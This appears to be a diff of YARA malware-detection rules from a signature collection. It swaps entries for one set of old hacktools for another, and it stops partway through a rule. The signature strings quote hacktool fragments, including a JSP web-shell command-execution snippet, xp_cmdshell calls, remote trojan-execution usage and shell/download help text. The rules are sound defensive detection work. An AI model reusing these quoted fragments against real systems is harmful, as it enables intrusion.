+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2041-L2069"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ed86ff44bddcfdd630ade8ced39b4559316195ba"
-		logic_hash = "8959837257848a08240d0423971b9d3a850a7e9cc796de2c9b2d34814923f8ec"
-		score = 75
+		hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
+		logic_hash = "89f978742ab952b727a9a8dbab0cd88cfc07440e8c4f974dcfa14ed630083761"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Watchdog thread %d waiting on Mutex" fullword ascii
-		$s1 = "Exploit ok run command" fullword ascii
-		$s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" ascii
-		$s3 = "Alllocated userspace PATHRECORD () %p" fullword ascii
-		$s4 = "Mutex object did not timeout, list not patched" fullword ascii
+		$s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" fullword ascii
+		$s1 = "http://IP/a.exe a.exe                 -->Download A File" fullword ascii
+		$s2 = "StopSniffer                           -->Stop Pass Sniffer" fullword ascii
+		$s3 = "TerminalPort Port                     -->Set New Terminal Port" fullword ascii
+		$s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii
+		$s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii
+		$s7 = "StartSniffer NIC                      -->Start Sniffer" fullword ascii
+		$s8 = "Shell                                 -->Get A Shell" fullword ascii
+		$s11 = "DeleteService ServiceName             -->Delete A Service" fullword ascii
+		$s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" fullword ascii
+		$s13 = "Online                                -->List All Connected IP" fullword ascii
+		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii
+		$s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii
+		$s18 = "Execute Program                       -->Execute A Program" fullword ascii
+		$s19 = "Reboot                                -->Reboot The System" fullword ascii
+		$s20 = "Password Sniffering Is Not Running" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 270KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Tools_Unknown : FILE
+rule SIGNATURE_BASE_Sig_238_Cmd_2
 {
 	meta:
-		description = "Chinese Hacktool Set - file unknown.exe"
+		description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2cb75a84-506d-5b67-8b1f-b91beb5a99a3"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1237-L1254"
+		id = "5fae3c4a-aeeb-5e02-9071-3980a39a19a9"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2071-L2088"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4be8270c4faa1827177e2310a00af2d5bcd2a59f"
-		logic_hash = "493bb63d4dd519efbf53a29fa44ef74f0a85943b2d9f49f11e3daa57c6b03d8e"
-		score = 75
+		hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
+		logic_hash = "a794d6b60194a190bd8d549ad00cf90649a52d831fdc7539c68a1f6312609bc2"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
-		$s2 = "GET /ok.asp?id=1__sql__ HTTP/1.1" fullword ascii
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s4 = "Failed to clear tab control Failed to delete tab at index %d\"Failed to retrieve" wide
-		$s5 = "Host: 127.0.0.1" fullword ascii
+		$s0 = "Process child = Runtime.getRuntime().exec(" ascii
+		$s1 = "InputStream in = child.getInputStream();" fullword ascii
+		$s2 = "String cmd = request.getParameter(\"" ascii
+		$s3 = "while ((c = in.read()) != -1) {" fullword ascii
+		$s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_PLUGIN_Ajunk : FILE
+rule SIGNATURE_BASE_Rangescan
 {
 	meta:
-		description = "Chinese Hacktool Set - file AJunk.dll"
+		description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "af92d01d-5e24-52f7-934a-0ad102fc7a93"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1256-L1271"
+		id = "143d9e1e-41e2-579a-beee-30da2cf068f7"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2090-L2107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "eb430fcfe6d13b14ff6baa4b3f59817c0facec00"
-		logic_hash = "e37504aab506138493ddc0979697502819824ef00c7931599130fafb5d84a7a9"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
+		logic_hash = "f334a59c2d95505807df642a8d5605b1b7d8b3385a552e8f5a37f344d7a75412"
+		score = 60
+		quality = 35
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "AJunk.dll" fullword ascii
-		$s2 = "AJunk.DLL" fullword wide
-		$s3 = "AJunk Dynamic Link Library" fullword wide
+		$s0 = "RangeScan.EXE" fullword wide
+		$s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii
+		$s9 = "Produced by isn0" fullword ascii
+		$s10 = "RangeScan" fullword wide
+		$s20 = "%d-%d-%d %d:%d:%d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 560KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Iisputscanner : FILE
+rule SIGNATURE_BASE_Xyzcmd_Zip_Folder_Readme
 {
 	meta:
-		description = "Chinese Hacktool Set - file IISPutScanner.exe"
+		description = "Disclosed hacktool set (old stuff) - file Readme.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "699ee45d-c842-56eb-b55b-12a91e815a7b"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1273-L1316"
+		id = "cee0f8c3-f947-50a5-ae8c-4ce83ef5e433"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2109-L2123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9869c70d6a9ec2312c749aa17d4da362fa6e2592"
-		logic_hash = "b2af9003cef528610280866bf00a9716b4421a5f7c65e7c8ec3202af9a592de1"
-		score = 75
-		quality = 83
-		tags = "FILE"
+		hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
+		logic_hash = "38d69eee78ff8fa2ad064871481bd1b8a926146922952c7e199d27c809d0c980"
+		score = 60
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "KERNEL32.DLL" fullword ascii
-		$s3 = "ADVAPI32.DLL" fullword ascii
-		$s4 = "VERSION.DLL" fullword ascii
-		$s5 = "WSOCK32.DLL" fullword ascii
-		$s6 = "COMCTL32.DLL" fullword ascii
-		$s7 = "GDI32.DLL" fullword ascii
-		$s8 = "SHELL32.DLL" fullword ascii
-		$s9 = "USER32.DLL" fullword ascii
-		$s10 = "OLEAUT32.DLL" fullword ascii
-		$s11 = "LoadLibraryA" fullword ascii
-		$s12 = "GetProcAddress" fullword ascii
-		$s13 = "VirtualProtect" fullword ascii
-		$s14 = "VirtualAlloc" fullword ascii
-		$s15 = "VirtualFree" fullword ascii
-		$s16 = "ExitProcess" fullword ascii
-		$s17 = "RegCloseKey" fullword ascii
-		$s18 = "GetFileVersionInfoA" fullword ascii
-		$s19 = "ImageList_Add" fullword ascii
-		$s20 = "BitBlt" fullword ascii
-		$s21 = "ShellExecuteA" fullword ascii
-		$s22 = "ActivateKeyboardLayout" fullword ascii
-		$s23 = "BBABORT" fullword wide
-		$s25 = "BBCANCEL" fullword wide
-		$s26 = "BBCLOSE" fullword wide
-		$s27 = "BBHELP" fullword wide
-		$s28 = "BBIGNORE" fullword wide
-		$s29 = "PREVIEWGLYPH" fullword wide
-		$s30 = "DLGTEMPLATE" fullword wide
-		$s31 = "TABOUTBOX" fullword wide
-		$s32 = "TFORM1" fullword wide
-		$s33 = "MAINICON" fullword wide
+		$s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
+		$s20 = "XYZCmd V1.0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and filesize > 350KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Idtools_For_Winxp_Idttool_2 : FILE
+rule SIGNATURE_BASE_Bypassfirewall_Zip_Folder_Inject
 {
 	meta:
-		description = "Chinese Hacktool Set - file IdtTool.sys"
+		description = "Disclosed hacktool set (old stuff) - file Inject.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0312be49-c262-5143-abfc-02d428552b86"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1318-L1335"
+		id = "bb31dc53-f3c1-5f8b-84f9-c231a4e1675b"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2125-L2140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "07feb31dd21d6f97614118b8a0adf231f8541a67"
-		logic_hash = "831f42abd7374b2ca2b4115a73aae2123e2212b0854d4cc0950b8e66a28e38a3"
-		score = 75
+		hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
+		logic_hash = "6350e11097bc2bb8fb0fbecf6be463aeaf39ad4169d2dd06a57577bf02b515f8"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\Device\\devIdtTool" wide
-		$s1 = "IoDeleteSymbolicLink" fullword ascii
-		$s3 = "IoDeleteDevice" fullword ascii
-		$s6 = "IoCreateSymbolicLink" fullword ascii
-		$s7 = "IoCreateDevice" fullword ascii
+		$s6 = "Fail To Inject" fullword ascii
+		$s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii
+		$s11 = " Successfully" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Hkmjjiis6 : FILE
+rule SIGNATURE_BASE_Sig_238_Sqlcmd
 {
 	meta:
-		description = "Chinese Hacktool Set - file hkmjjiis6.exe"
+		description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9618c6ec-1557-5b1b-bebc-1c220bb3aba4"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1337-L1358"
+		id = "0efdfac7-5a89-5251-b583-12b0a58c48ff"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2142-L2161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
-		logic_hash = "4ea95b7a5bd24e0dfdcef045d101b7f15e18b20f1328901bb340d9aaad336981"
-		score = 75
+		hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
+		logic_hash = "1e41c38da7552d6a25c918547a39ed07ec38a537fd04e2090d1199c4fb0e3b1e"
+		score = 40
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "comspec" fullword ascii
-		$s2 = "user32.dlly" ascii
-		$s3 = "runtime error" ascii
-		$s4 = "WinSta0\\Defau" ascii
-		$s5 = "AppIDFlags" fullword ascii
-		$s6 = "GetLag" fullword ascii
-		$s7 = "* FROM IIsWebInfo" ascii
-		$s8 = "wmiprvse.exe" ascii
-		$s9 = "LookupAcc" ascii
+		$s0 = "Permission denial to EXEC command.:(" ascii
+		$s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii
+		$s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii
+		$s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii
+		$s6 = "SqlCmd2.exe Inside Edition." fullword ascii
+		$s7 = "Http://www.patching.net  2000/12/14" fullword ascii
+		$s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Dos_Lcx : FILE
+rule SIGNATURE_BASE_Aspack_ASPACK
 {
 	meta:
-		description = "Chinese Hacktool Set - file lcx.exe"
+		description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2f443673-bfed-5ce3-a0e6-6b59f27c9658"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1360-L1384"
+		id = "ca9a25f9-a94b-5e10-b935-c6e2d38d999c"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2163-L2178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b6ad5dd13592160d9f052bb47b0d6a87b80a406d"
-		logic_hash = "bbe215fb27825b4f4bbfa71808ac945f341efbc70a21f79689065982a843d7f1"
-		score = 75
+		hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
+		logic_hash = "1c7abc0a126ee8c8b20e55ad85974067f1a230efc5f95a1a1e732025e39d5bab"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "c:\\Users\\careful_snow\\" ascii
-		$s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii
-		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s6 = "=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] " ascii
-		$s7 = "[-] There is a error...Create a new connection." fullword ascii
-		$s8 = "[+] Accept a Client on port %d from %s" fullword ascii
-		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s13 = "[+] Make a Connection to %s:%d...." fullword ascii
-		$s16 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
-		$s17 = "[+] Waiting another Client on port:%d...." fullword ascii
-		$s18 = "[+] Accept a Client on port %d from %s ......" fullword ascii
+		$s0 = "ASPACK.EXE" fullword wide
+		$s5 = "CLOSEDFOLDER" fullword wide
+		$s10 = "ASPack compressor" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_X_Way2_5_X_Way : FILE
+rule SIGNATURE_BASE_Sig_238_2323
 {
 	meta:
-		description = "Chinese Hacktool Set - file X-way.exe"
+		description = "Disclosed hacktool set (old stuff) - file 2323.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8e878671-2a7c-5c6e-a905-05d303f42e0f"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1386-L1407"
+		id = "445f6a49-51e6-5eb8-ae08-e5989aafb6c4"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2180-L2198"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8ba8530fbda3e8342e8d4feabbf98c66a322dac6"
-		logic_hash = "6261de5db1e7527f7726effe26ed5f88638e6cb378db4c99183dddcd42ae231f"
-		score = 75
+		hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
+		logic_hash = "1278c53f64a0ba7f3f6a728237eac6808b260ad36551923276bfba9b36586870"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "TTFTPSERVERFRM" fullword wide
-		$s1 = "TPORTSCANSETFRM" fullword wide
-		$s2 = "TIISSHELLFRM" fullword wide
-		$s3 = "TADVSCANSETFRM" fullword wide
-		$s4 = "ntwdblib.dll" fullword ascii
-		$s5 = "TSNIFFERFRM" fullword wide
-		$s6 = "TCRACKSETFRM" fullword wide
-		$s7 = "TCRACKFRM" fullword wide
-		$s8 = "dbnextrow" fullword ascii
+		$s0 = "port - Port to listen on, defaults to 2323" fullword ascii
+		$s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii
+		$s3 = "Failed to execute shell" fullword ascii
+		$s5 = "/h   - Hide Window" fullword ascii
+		$s7 = "Accepted connection from client at %s" fullword ascii
+		$s9 = "Error %d: %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them
+		all of them
 }
-rule SIGNATURE_BASE_Tools_Sqlcmd : FILE
+rule SIGNATURE_BASE_Jc_ALL_Wineggdropshell_Rar_Folder_Install_2
 {
 	meta:
-		description = "Chinese Hacktool Set - file Sqlcmd.exe"
+		description = "Disclosed hacktool set (old stuff) - file Install.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "26e29826-d4bb-55d0-9331-a91e4473daca"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1409-L1428"
+		id = "ebfc8e53-328c-5deb-bf9b-e0270f171c68"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2200-L2218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "99d56476e539750c599f76391d717c51c4955a33"
-		logic_hash = "aa600f7c56d72d767e9ca51d8b1ee2b2c62302ea1afbed39e4670debd30c5247"
-		score = 75
+		hash = "95866e917f699ee74d4735300568640ea1a05afd"
+		logic_hash = "9c12e8491918a656e37b4ee6c3a42ec970cb6cf101ca5fe3fdfe9eab16526219"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "[Usage]:  %s <HostName|IP> <UserName> <Password>" fullword ascii
-		$s1 = "=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============" fullword ascii
-		$s4 = "Cool! Connected to SQL server on %s successfully!" fullword ascii
-		$s5 = "EXEC master..xp_cmdshell \"%s\"" fullword ascii
-		$s6 = "=======================Sqlcmd v0.21 For HScan v1.20=======================" fullword ascii
-		$s10 = "Error,exit!" fullword ascii
-		$s11 = "Sqlcmd>" fullword ascii
+		$s1 = "http://go.163.com/sdemo" fullword wide
+		$s2 = "Player.tmp" fullword ascii
+		$s3 = "Player.EXE" fullword wide
+		$s4 = "mailto:sdemo@263.net" fullword ascii
+		$s5 = "S-Player.exe" fullword ascii
+		$s9 = "http://www.BaiXue.net (" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sword1_5 : FILE
+rule SIGNATURE_BASE_Sig_238_TFTPD32
 {
 	meta:
-		description = "Chinese Hacktool Set - file Sword1.5.exe"
+		description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dff8666a-0373-5605-9012-92b2b3ec71ea"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1430-L1449"
+		id = "071fba15-affe-539a-bcc0-c14943fff51a"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2220-L2241"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
-		logic_hash = "09e09f7ea16dc917388cbccb22a7abfed9b693a33d61698f0e838f029402c256"
-		score = 75
+		hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
+		logic_hash = "cbf239330f8f1fd8be3ef3c93571c723447ca3b814fb7c1eff5ea4b2e7f5364f"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "http://www.ip138.com/ip2city.asp" fullword wide
-		$s4 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide
-		$s6 = "ListBox_Command" fullword wide
-		$s13 = "md=7fef6171469e80d32c0559f88b377245&submit=MD5+Crack" fullword wide
-		$s18 = "\\Set.ini" wide
-		$s19 = "OpenFileDialog1" fullword wide
-		$s20 = " (*.txt)|*.txt" fullword wide
+		$s0 = " http://arm.533.net" fullword ascii
+		$s1 = "Tftpd32.hlp" fullword ascii
+		$s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii
+		$s3 = "TFTPD32 -- " fullword wide
+		$s4 = "%d -- %s" fullword ascii
+		$s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii
+		$s12 = "TftpPort" fullword ascii
+		$s13 = "Ttftpd32BackGround" fullword ascii
+		$s17 = "SOFTWARE\\TFTPD32" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Tools_Scan : FILE
+rule SIGNATURE_BASE_Sig_238_Iecv
 {
 	meta:
-		description = "Chinese Hacktool Set - file scan.exe"
+		description = "Disclosed hacktool set (old stuff) - file iecv.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4601d4d0-2b7e-5937-87b6-df80ab373752"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1451-L1466"
+		id = "08126db3-267b-5289-b562-40bc264f6e3e"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2243-L2260"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c580a0cc41997e840d2c0f83962e7f8b636a5a13"
-		logic_hash = "d8bf2e4a4634f74ce548a5824090502f2ccef382bdbcaf795df711e88a325912"
-		score = 75
-		quality = 81
-		tags = "FILE"
+		hash = "6e6e75350a33f799039e7a024722cde463328b6d"
+		logic_hash = "e2985d85030d88cb63eb8b80673812f85aea6e11c6aeb430387cdb8886958b6a"
+		score = 60
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Shanlu Studio" fullword wide
-		$s3 = "_AutoAttackMain" fullword ascii
-		$s4 = "_frmIpToAddr" fullword ascii
+		$s1 = "Edit The Content Of Cookie " fullword wide
+		$s3 = "Accessories\\wordpad.exe" fullword ascii
+		$s4 = "gorillanation.com" fullword ascii
+		$s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
+		$s12 = "http://nirsoft.cjb.net" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Dos_C : FILE
+rule SIGNATURE_BASE_Antiy_Ports_1_21
 {
 	meta:
-		description = "Chinese Hacktool Set - file c.exe"
+		description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2e8319de-fe54-5083-968c-4707d127f072"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1468-L1487"
+		id = "eb53fc91-4dec-5416-a2c7-1e8256297886"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2262-L2277"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3deb6bd52fdac6d5a3e9a91c585d67820ab4df78"
-		logic_hash = "2865b50e6a323462fab39bd84571939c618cf6f00e147039f6e699ba4d195a00"
-		score = 75
+		hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
+		logic_hash = "fb175c413faf0ca33cf166029b217aac31126d6cabc81883c16b2de2ab00c16c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "!Win32 .EXE." fullword ascii
-		$s1 = ".MPRESS1" fullword ascii
-		$s2 = ".MPRESS2" fullword ascii
-		$s3 = "XOLEHLP.dll" fullword ascii
-		$s4 = "</body></html>" fullword ascii
-		$s8 = "DtcGetTransactionManagerExA" fullword ascii
-		$s9 = "GetUserNameA" fullword ascii
+		$s0 = "AntiyPorts.EXE" fullword wide
+		$s7 = "AntiyPorts MFC Application" fullword wide
+		$s20 = " @Stego:" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Arpsniffer : FILE
+rule SIGNATURE_BASE_Perlcmd_Zip_Folder_Cmd
 {
 	meta:
-		description = "Chinese Hacktool Set - file arpsniffer.exe"
+		description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
 		author = "Florian Roth (Nextron Systems)"
-		id = "78db3b18-008a-5a4e-9504-0cbe3b852046"
-		date = "2015-06-13"
-		modified = "2023-12-05"
